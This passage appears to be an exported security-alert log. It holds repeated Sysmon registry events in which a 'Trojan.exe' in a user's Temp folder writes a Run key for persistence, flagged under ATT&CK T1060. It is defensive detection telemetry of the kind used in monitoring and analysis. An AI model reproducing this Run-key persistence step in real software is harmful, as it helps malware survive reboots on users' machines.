HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:54.998740900Z"",""eventRecordID"":""1356"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:54.997\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:54.997"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.582",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:53.995 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:54.001206900Z"",""eventRecordID"":""1353"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:53.995\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:53.995"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.441",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:52.987 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:52.988480400Z"",""eventRecordID"":""1348"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:52.987\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:52.987"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.425",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:51.982 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:51.999599900Z"",""eventRecordID"":""1347"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:51.982\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:51.982"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.395",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:50.966 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:50.973425400Z"",""eventRecordID"":""1346"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:50.966\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:50.966"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:30.364",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:49.950 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:49.952753000Z"",""eventRecordID"":""1345"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:49.950\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:49.950"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:22.805",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:48.935 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:48.939279000Z"",""eventRecordID"":""1344"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:48.935\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:48.935"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:14.202",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:47.919 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:47.922383300Z"",""eventRecordID"":""1342"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:47.919\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:47.919"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:13.765",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:46.906 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:46.980470200Z"",""eventRecordID"":""1340"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:46.906\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:46.906"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:05.152",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:45.879 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:45.916255100Z"",""eventRecordID"":""1335"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:45.879\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:45.879"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:04.704",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:44.828 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:44.833070900Z"",""eventRecordID"":""1333"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:44.828\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:44.828"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:04.343",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:43.785 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 